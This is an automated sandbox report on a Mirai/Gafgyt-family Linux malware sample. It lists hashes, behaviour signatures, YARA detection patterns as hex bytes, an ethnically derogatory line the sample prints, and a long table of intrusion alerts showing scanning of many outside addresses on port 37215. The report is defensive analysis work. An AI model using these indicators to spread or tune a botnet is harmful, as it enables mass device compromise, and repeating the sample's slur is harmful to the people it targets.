Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
jYEvdBHMOI.elf

Overview

General Information

Sample name:jYEvdBHMOI.elf
renamed because original name is a hash value
Original sample name:dd8e5504e1fe35fba03c3186a011f469.elf
Analysis ID:1532261
MD5:dd8e5504e1fe35fba03c3186a011f469
SHA1:3ceb54fff9e8ffdc3015763d38d4468364924488
SHA256:e708b2fc943bbb9782427435b3a39b7f80d9ef06946792119581c700b8c87d39
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1532261
Start date and time:2024-10-12 23:04:20 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:jYEvdBHMOI.elf
renamed because original name is a hash value
Original Sample Name:dd8e5504e1fe35fba03c3186a011f469.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@16681/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/jYEvdBHMOI.elf
PID:5485
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
jYEvdBHMOI.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    jYEvdBHMOI.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      jYEvdBHMOI.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        jYEvdBHMOI.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0xed58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xed6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xed80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xed94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xeda8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xedbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xedd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xede4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xedf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xee98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xeeac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xeec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xeed4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xeee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        jYEvdBHMOI.elfLinux_Trojan_Gafgyt_ea92cca8unknownunknown
        • 0xf2b8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        5485.1.00007ff360011000.00007ff360022000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
          5485.1.00007ff360011000.00007ff360022000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5485.1.00007ff360011000.00007ff360022000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5485.1.00007ff360011000.00007ff360022000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0xed58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xed6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xed80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xed94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xeda8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xedbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xedd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xede4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xedf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xee98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xeeac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xeec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xeed4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xeee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              5485.1.00007ff360011000.00007ff360022000.r-x.sdmpLinux_Trojan_Gafgyt_ea92cca8unknownunknown
              • 0xf2b8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
              Click to see the 6 entries
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-12T23:05:04.196293+020028352221A Network Trojan was detected192.168.2.1447802197.217.19.3637215TCP
              2024-10-12T23:05:04.196331+020028352221A Network Trojan was detected192.168.2.1460184197.130.210.23437215TCP
              2024-10-12T23:05:05.589517+020028352221A Network Trojan was detected192.168.2.1446160197.129.254.17037215TCP
              2024-10-12T23:05:05.695013+020028352221A Network Trojan was detected192.168.2.1456270197.145.224.837215TCP
              2024-10-12T23:05:06.351839+020028352221A Network Trojan was detected192.168.2.1453124197.4.197.2537215TCP
              2024-10-12T23:05:06.354480+020028352221A Network Trojan was detected192.168.2.1453940197.234.206.4737215TCP
              2024-10-12T23:05:08.910923+020028352221A Network Trojan was detected192.168.2.1442062197.147.154.12737215TCP
              2024-10-12T23:05:08.955458+020028352221A Network Trojan was detected192.168.2.1441642156.224.250.12237215TCP
              2024-10-12T23:05:09.543148+020028352221A Network Trojan was detected192.168.2.1453030197.8.61.21037215TCP
              2024-10-12T23:05:09.543149+020028352221A Network Trojan was detected192.168.2.1447332197.67.144.18537215TCP
              2024-10-12T23:05:09.543149+020028352221A Network Trojan was detected192.168.2.1460810197.159.98.4737215TCP
              2024-10-12T23:05:09.543149+020028352221A Network Trojan was detected192.168.2.1457058156.114.31.17937215TCP
              2024-10-12T23:05:09.543150+020028352221A Network Trojan was detected192.168.2.1434190197.52.78.21137215TCP
              2024-10-12T23:05:09.543150+020028352221A Network Trojan was detected192.168.2.1440540156.160.14.24937215TCP
              2024-10-12T23:05:09.543159+020028352221A Network Trojan was detected192.168.2.1455328197.173.145.8937215TCP
              2024-10-12T23:05:09.543159+020028352221A Network Trojan was detected192.168.2.1447700197.171.51.5037215TCP
              2024-10-12T23:05:09.543188+020028352221A Network Trojan was detected192.168.2.1435516156.2.214.19537215TCP
              2024-10-12T23:05:09.543267+020028352221A Network Trojan was detected192.168.2.1454792156.232.85.22437215TCP
              2024-10-12T23:05:10.390500+020028352221A Network Trojan was detected192.168.2.1446004156.226.33.11637215TCP
              2024-10-12T23:05:10.596007+020028352221A Network Trojan was detected192.168.2.1434366156.224.53.12637215TCP
              2024-10-12T23:05:11.342479+020028352221A Network Trojan was detected192.168.2.1432784156.222.164.15237215TCP
              2024-10-12T23:05:11.342583+020028352221A Network Trojan was detected192.168.2.1438498156.99.87.1237215TCP
              2024-10-12T23:05:13.390518+020028352221A Network Trojan was detected192.168.2.1448042197.232.92.20237215TCP
              2024-10-12T23:05:14.418899+020028352221A Network Trojan was detected192.168.2.1455388197.214.233.23437215TCP
              2024-10-12T23:05:15.007041+020028352221A Network Trojan was detected192.168.2.1442546156.154.242.20037215TCP
              2024-10-12T23:05:18.429766+020028352221A Network Trojan was detected192.168.2.1443968197.6.168.4037215TCP
              2024-10-12T23:05:20.080465+020028352221A Network Trojan was detected192.168.2.1457482197.97.238.17937215TCP
              2024-10-12T23:05:21.203206+020028352221A Network Trojan was detected192.168.2.1442670197.146.39.4937215TCP
              2024-10-12T23:05:24.409554+020028352221A Network Trojan was detected192.168.2.1433646197.99.226.20137215TCP
              2024-10-12T23:05:24.409569+020028352221A Network Trojan was detected192.168.2.1436612197.82.210.20137215TCP
              2024-10-12T23:05:24.441246+020028352221A Network Trojan was detected192.168.2.1449318197.246.115.2037215TCP
              2024-10-12T23:05:24.441595+020028352221A Network Trojan was detected192.168.2.1455158197.214.159.20637215TCP
              2024-10-12T23:05:24.441633+020028352221A Network Trojan was detected192.168.2.1443990197.93.192.15237215TCP
              2024-10-12T23:05:24.472354+020028352221A Network Trojan was detected192.168.2.1433326197.232.206.23237215TCP
              2024-10-12T23:05:24.474316+020028352221A Network Trojan was detected192.168.2.1455228197.226.31.12937215TCP
              2024-10-12T23:05:24.532605+020028352221A Network Trojan was detected192.168.2.1460714197.202.144.337215TCP
              2024-10-12T23:05:24.532735+020028352221A Network Trojan was detected192.168.2.1447442197.188.219.16737215TCP
              2024-10-12T23:05:24.532772+020028352221A Network Trojan was detected192.168.2.1445228197.31.2.10737215TCP
              2024-10-12T23:05:24.532997+020028352221A Network Trojan was detected192.168.2.1434130197.140.140.6237215TCP
              2024-10-12T23:05:24.536505+020028352221A Network Trojan was detected192.168.2.1445668197.0.66.25537215TCP
              2024-10-12T23:05:24.563526+020028352221A Network Trojan was detected192.168.2.1449894197.228.54.11137215TCP
              2024-10-12T23:05:24.563635+020028352221A Network Trojan was detected192.168.2.1460228197.230.7.2937215TCP
              2024-10-12T23:05:24.564099+020028352221A Network Trojan was detected192.168.2.1449128197.245.117.3937215TCP
              2024-10-12T23:05:24.565650+020028352221A Network Trojan was detected192.168.2.1432836197.239.219.10737215TCP
              2024-10-12T23:05:24.565717+020028352221A Network Trojan was detected192.168.2.1458264197.173.97.5937215TCP
              2024-10-12T23:05:24.565831+020028352221A Network Trojan was detected192.168.2.1451234197.146.72.18537215TCP
              2024-10-12T23:05:24.566438+020028352221A Network Trojan was detected192.168.2.1436878197.211.197.17137215TCP
              2024-10-12T23:05:24.566729+020028352221A Network Trojan was detected192.168.2.1436806197.248.211.23337215TCP
              2024-10-12T23:05:24.569564+020028352221A Network Trojan was detected192.168.2.1443028197.32.210.18737215TCP
              2024-10-12T23:05:24.569703+020028352221A Network Trojan was detected192.168.2.1456856197.109.217.9637215TCP
              2024-10-12T23:05:24.569894+020028352221A Network Trojan was detected192.168.2.1442172197.69.70.24637215TCP
              2024-10-12T23:05:24.612809+020028352221A Network Trojan was detected192.168.2.1436602197.162.136.1237215TCP
              2024-10-12T23:05:24.644396+020028352221A Network Trojan was detected192.168.2.1442550197.147.55.3637215TCP
              2024-10-12T23:05:24.657641+020028352221A Network Trojan was detected192.168.2.1448182197.116.59.17037215TCP
              2024-10-12T23:05:24.659428+020028352221A Network Trojan was detected192.168.2.1433212197.207.20.10937215TCP
              2024-10-12T23:05:24.661508+020028352221A Network Trojan was detected192.168.2.1460378197.196.146.12737215TCP
              2024-10-12T23:05:24.677300+020028352221A Network Trojan was detected192.168.2.1456800197.178.54.12037215TCP
              2024-10-12T23:05:24.704768+020028352221A Network Trojan was detected192.168.2.1437954197.182.130.9637215TCP
              2024-10-12T23:05:24.708311+020028352221A Network Trojan was detected192.168.2.1441414197.65.90.12137215TCP
              2024-10-12T23:05:24.721223+020028352221A Network Trojan was detected192.168.2.1433050197.60.222.22737215TCP
              2024-10-12T23:05:24.721858+020028352221A Network Trojan was detected192.168.2.1433082197.2.193.20237215TCP
              2024-10-12T23:05:24.736111+020028352221A Network Trojan was detected192.168.2.1458432197.173.16.18037215TCP
              2024-10-12T23:05:24.736165+020028352221A Network Trojan was detected192.168.2.1434380197.158.6.21037215TCP
              2024-10-12T23:05:24.736257+020028352221A Network Trojan was detected192.168.2.1438208197.36.25.16237215TCP
              2024-10-12T23:05:24.737667+020028352221A Network Trojan was detected192.168.2.1445682197.233.160.23637215TCP
              2024-10-12T23:05:24.741840+020028352221A Network Trojan was detected192.168.2.1460598197.163.194.11037215TCP
              2024-10-12T23:05:24.784234+020028352221A Network Trojan was detected192.168.2.1434760197.161.217.3637215TCP
              2024-10-12T23:05:24.800156+020028352221A Network Trojan was detected192.168.2.1452824197.51.150.22237215TCP
              2024-10-12T23:05:24.800582+020028352221A Network Trojan was detected192.168.2.1456832197.225.41.15337215TCP
              2024-10-12T23:05:24.813797+020028352221A Network Trojan was detected192.168.2.1450862197.201.150.4337215TCP
              2024-10-12T23:05:24.816011+020028352221A Network Trojan was detected192.168.2.1453216197.210.231.12137215TCP
              2024-10-12T23:05:24.833832+020028352221A Network Trojan was detected192.168.2.1439730197.220.94.5837215TCP
              2024-10-12T23:05:24.845268+020028352221A Network Trojan was detected192.168.2.1446352197.119.207.20337215TCP
              2024-10-12T23:05:24.865225+020028352221A Network Trojan was detected192.168.2.1433586197.51.157.21937215TCP
              2024-10-12T23:05:24.880682+020028352221A Network Trojan was detected192.168.2.1454922197.110.97.15737215TCP
              2024-10-12T23:05:24.892882+020028352221A Network Trojan was detected192.168.2.1457920197.90.15.10937215TCP
              2024-10-12T23:05:24.893715+020028352221A Network Trojan was detected192.168.2.1457652197.23.60.8237215TCP
              2024-10-12T23:05:24.893879+020028352221A Network Trojan was detected192.168.2.1454866197.95.31.1137215TCP
              2024-10-12T23:05:24.911753+020028352221A Network Trojan was detected192.168.2.1451320197.179.202.3437215TCP
              2024-10-12T23:05:24.927500+020028352221A Network Trojan was detected192.168.2.1433490197.169.135.16037215TCP
              2024-10-12T23:05:24.939567+020028352221A Network Trojan was detected192.168.2.1442842197.239.18.16237215TCP
              2024-10-12T23:05:24.954453+020028352221A Network Trojan was detected192.168.2.1445978197.13.126.21037215TCP
              2024-10-12T23:05:24.955063+020028352221A Network Trojan was detected192.168.2.1438018197.146.70.25037215TCP
              2024-10-12T23:05:24.960306+020028352221A Network Trojan was detected192.168.2.1454710197.17.180.17837215TCP
              2024-10-12T23:05:24.970226+020028352221A Network Trojan was detected192.168.2.1447386197.119.115.16037215TCP
              2024-10-12T23:05:24.987610+020028352221A Network Trojan was detected192.168.2.1459914197.248.179.6837215TCP
              2024-10-12T23:05:24.987640+020028352221A Network Trojan was detected192.168.2.1449250197.17.109.6837215TCP
              2024-10-12T23:05:25.017556+020028352221A Network Trojan was detected192.168.2.1449692197.244.2.15937215TCP
              2024-10-12T23:05:25.021920+020028352221A Network Trojan was detected192.168.2.1458198197.103.57.1837215TCP
              2024-10-12T23:05:25.033904+020028352221A Network Trojan was detected192.168.2.1442312197.24.164.14637215TCP
              2024-10-12T23:05:25.065611+020028352221A Network Trojan was detected192.168.2.1439632197.60.9.15137215TCP
              2024-10-12T23:05:25.066773+020028352221A Network Trojan was detected192.168.2.1449118197.255.125.5437215TCP
              2024-10-12T23:05:25.066941+020028352221A Network Trojan was detected192.168.2.1460468197.169.87.7137215TCP
              2024-10-12T23:05:25.079877+020028352221A Network Trojan was detected192.168.2.1435446197.23.120.19837215TCP
              2024-10-12T23:05:25.095033+020028352221A Network Trojan was detected192.168.2.1456372197.104.82.7637215TCP
              2024-10-12T23:05:25.100062+020028352221A Network Trojan was detected192.168.2.1460622197.124.18.21837215TCP
              2024-10-12T23:05:25.112036+020028352221A Network Trojan was detected192.168.2.1458088197.24.118.17937215TCP
              2024-10-12T23:05:25.128056+020028352221A Network Trojan was detected192.168.2.1437296197.32.224.23937215TCP
              2024-10-12T23:05:25.129351+020028352221A Network Trojan was detected192.168.2.1453972197.190.135.12537215TCP
              2024-10-12T23:05:25.143174+020028352221A Network Trojan was detected192.168.2.1439676197.158.63.3537215TCP
              2024-10-12T23:05:25.144819+020028352221A Network Trojan was detected192.168.2.1454714197.220.175.20737215TCP
              2024-10-12T23:05:25.173295+020028352221A Network Trojan was detected192.168.2.1433492197.227.201.13737215TCP
              2024-10-12T23:05:25.173492+020028352221A Network Trojan was detected192.168.2.1436402197.246.122.11637215TCP
              2024-10-12T23:05:25.191459+020028352221A Network Trojan was detected192.168.2.1456866197.89.101.16837215TCP
              2024-10-12T23:05:25.219859+020028352221A Network Trojan was detected192.168.2.1452034197.50.74.14237215TCP
              2024-10-12T23:05:25.221447+020028352221A Network Trojan was detected192.168.2.1441156197.2.166.6437215TCP
              2024-10-12T23:05:25.221714+020028352221A Network Trojan was detected192.168.2.1458018197.46.123.10737215TCP
              2024-10-12T23:05:25.256813+020028352221A Network Trojan was detected192.168.2.1447694197.152.24.137215TCP
              2024-10-12T23:05:25.257004+020028352221A Network Trojan was detected192.168.2.1450466197.23.40.22537215TCP
              2024-10-12T23:05:25.257238+020028352221A Network Trojan was detected192.168.2.1449524197.3.49.22537215TCP
              2024-10-12T23:05:25.267645+020028352221A Network Trojan was detected192.168.2.1445228197.190.79.4337215TCP
              2024-10-12T23:05:25.267761+020028352221A Network Trojan was detected192.168.2.1447562197.33.17.10337215TCP
              2024-10-12T23:05:25.288198+020028352221A Network Trojan was detected192.168.2.1457106197.71.201.13437215TCP
              2024-10-12T23:05:25.299797+020028352221A Network Trojan was detected192.168.2.1448376197.105.79.11337215TCP
              2024-10-12T23:05:25.314375+020028352221A Network Trojan was detected192.168.2.1445410197.38.134.7637215TCP
              2024-10-12T23:05:25.315139+020028352221A Network Trojan was detected192.168.2.1447614197.21.174.10837215TCP
              2024-10-12T23:05:25.315758+020028352221A Network Trojan was detected192.168.2.1451160197.228.101.6237215TCP
              2024-10-12T23:05:25.316730+020028352221A Network Trojan was detected192.168.2.1435516197.62.104.937215TCP
              2024-10-12T23:05:25.316892+020028352221A Network Trojan was detected192.168.2.1454686197.96.54.17937215TCP
              2024-10-12T23:05:25.319831+020028352221A Network Trojan was detected192.168.2.1459016197.45.43.11437215TCP
              2024-10-12T23:05:25.330509+020028352221A Network Trojan was detected192.168.2.1442028197.28.102.1737215TCP
              2024-10-12T23:05:25.347405+020028352221A Network Trojan was detected192.168.2.1459566197.137.36.18937215TCP
              2024-10-12T23:05:25.347405+020028352221A Network Trojan was detected192.168.2.1436928197.182.175.3537215TCP
              2024-10-12T23:05:25.347460+020028352221A Network Trojan was detected192.168.2.1453214197.154.116.11037215TCP
              2024-10-12T23:05:25.348046+020028352221A Network Trojan was detected192.168.2.1446846197.141.73.25437215TCP
              2024-10-12T23:05:25.360695+020028352221A Network Trojan was detected192.168.2.1445728197.54.104.20937215TCP
              2024-10-12T23:05:25.360696+020028352221A Network Trojan was detected192.168.2.1449260197.226.25.20437215TCP
              2024-10-12T23:05:25.361134+020028352221A Network Trojan was detected192.168.2.1454872197.207.149.11537215TCP
              2024-10-12T23:05:25.361184+020028352221A Network Trojan was detected192.168.2.1448860197.212.181.21437215TCP
              2024-10-12T23:05:25.362882+020028352221A Network Trojan was detected192.168.2.1436204197.185.187.10637215TCP
              2024-10-12T23:05:25.363003+020028352221A Network Trojan was detected192.168.2.1449508197.96.248.15037215TCP
              2024-10-12T23:05:25.363129+020028352221A Network Trojan was detected192.168.2.1451702197.54.167.22737215TCP
              2024-10-12T23:05:25.363330+020028352221A Network Trojan was detected192.168.2.1454660197.189.179.20237215TCP
              2024-10-12T23:05:25.364162+020028352221A Network Trojan was detected192.168.2.1434310197.95.233.25137215TCP
              2024-10-12T23:05:25.365086+020028352221A Network Trojan was detected192.168.2.1455342197.38.27.9637215TCP
              2024-10-12T23:05:25.366644+020028352221A Network Trojan was detected192.168.2.1435470197.129.60.19437215TCP
              2024-10-12T23:05:25.375982+020028352221A Network Trojan was detected192.168.2.1440174197.106.49.13037215TCP
              2024-10-12T23:05:25.376729+020028352221A Network Trojan was detected192.168.2.1435754197.91.147.5437215TCP
              2024-10-12T23:05:25.376743+020028352221A Network Trojan was detected192.168.2.1441086197.250.68.25337215TCP
              2024-10-12T23:05:25.378408+020028352221A Network Trojan was detected192.168.2.1437440197.168.248.21037215TCP
              2024-10-12T23:05:25.381252+020028352221A Network Trojan was detected192.168.2.1442456197.99.232.20237215TCP
              2024-10-12T23:05:25.407640+020028352221A Network Trojan was detected192.168.2.1445648197.66.254.5837215TCP
              2024-10-12T23:05:25.408134+020028352221A Network Trojan was detected192.168.2.1439500197.41.17.12737215TCP
              2024-10-12T23:05:25.408246+020028352221A Network Trojan was detected192.168.2.1434260197.229.187.15737215TCP
              2024-10-12T23:05:25.408300+020028352221A Network Trojan was detected192.168.2.1443984197.75.91.7837215TCP
              2024-10-12T23:05:25.408361+020028352221A Network Trojan was detected192.168.2.1441846197.211.179.4637215TCP
              2024-10-12T23:05:25.408413+020028352221A Network Trojan was detected192.168.2.1433918197.1.90.10537215TCP
              2024-10-12T23:05:25.408502+020028352221A Network Trojan was detected192.168.2.1456642197.124.97.3437215TCP
              2024-10-12T23:05:25.409847+020028352221A Network Trojan was detected192.168.2.1452066197.208.89.13537215TCP
              2024-10-12T23:05:25.411505+020028352221A Network Trojan was detected192.168.2.1434530197.255.220.23337215TCP
              2024-10-12T23:05:25.439115+020028352221A Network Trojan was detected192.168.2.1443892197.164.217.23737215TCP
              2024-10-12T23:05:25.485516+020028352221A Network Trojan was detected192.168.2.1449488197.252.127.24537215TCP
              2024-10-12T23:05:25.489791+020028352221A Network Trojan was detected192.168.2.1453156197.156.71.037215TCP
              2024-10-12T23:05:25.537130+020028352221A Network Trojan was detected192.168.2.1452360197.173.102.16737215TCP
              2024-10-12T23:05:25.538317+020028352221A Network Trojan was detected192.168.2.1459348197.218.151.9937215TCP
              2024-10-12T23:05:25.552367+020028352221A Network Trojan was detected192.168.2.1447198197.159.119.11137215TCP
              2024-10-12T23:05:25.564251+020028352221A Network Trojan was detected192.168.2.1447440197.65.21.24237215TCP
              2024-10-12T23:05:25.564723+020028352221A Network Trojan was detected192.168.2.1451218197.151.135.11337215TCP
              2024-10-12T23:05:25.567972+020028352221A Network Trojan was detected192.168.2.1445370197.96.41.5437215TCP
              2024-10-12T23:05:26.456465+020028352221A Network Trojan was detected192.168.2.1459582197.1.111.9637215TCP
              2024-10-12T23:05:26.486031+020028352221A Network Trojan was detected192.168.2.1451502197.192.203.21237215TCP
              2024-10-12T23:05:26.486759+020028352221A Network Trojan was detected192.168.2.1441492197.37.120.24337215TCP
              2024-10-12T23:05:26.487823+020028352221A Network Trojan was detected192.168.2.1443486197.129.103.13637215TCP
              2024-10-12T23:05:26.517993+020028352221A Network Trojan was detected192.168.2.1440706197.49.44.13637215TCP
              2024-10-12T23:05:26.532801+020028352221A Network Trojan was detected192.168.2.1446122197.64.54.24037215TCP
              2024-10-12T23:05:26.534581+020028352221A Network Trojan was detected192.168.2.1441296197.202.237.14237215TCP
              2024-10-12T23:05:26.538818+020028352221A Network Trojan was detected192.168.2.1458652197.148.102.14237215TCP
              2024-10-12T23:05:26.548369+020028352221A Network Trojan was detected192.168.2.1454324197.110.175.16437215TCP
              2024-10-12T23:05:26.552221+020028352221A Network Trojan was detected192.168.2.1435806197.6.35.16737215TCP
              2024-10-12T23:05:26.611134+020028352221A Network Trojan was detected192.168.2.1454464197.53.57.22137215TCP
              2024-10-12T23:05:26.630430+020028352221A Network Trojan was detected192.168.2.1442072197.139.246.12137215TCP
              2024-10-12T23:05:26.652445+020028352221A Network Trojan was detected192.168.2.1442630197.197.233.19537215TCP
              2024-10-12T23:05:27.539172+020028352221A Network Trojan was detected192.168.2.1451014197.191.247.2637215TCP
              2024-10-12T23:05:27.563766+020028352221A Network Trojan was detected192.168.2.1438224197.112.42.12937215TCP
              2024-10-12T23:05:27.584106+020028352221A Network Trojan was detected192.168.2.1460616197.22.83.7737215TCP
              2024-10-12T23:05:27.612646+020028352221A Network Trojan was detected192.168.2.1440270197.215.60.19937215TCP
              2024-10-12T23:05:28.103692+020028352221A Network Trojan was detected192.168.2.1455058197.4.208.11537215TCP
              2024-10-12T23:05:28.519080+020028352221A Network Trojan was detected192.168.2.1442750197.125.149.11437215TCP
              2024-10-12T23:05:28.519428+020028352221A Network Trojan was detected192.168.2.1455638197.79.94.7037215TCP
              2024-10-12T23:05:28.519482+020028352221A Network Trojan was detected192.168.2.1437096197.108.44.15637215TCP
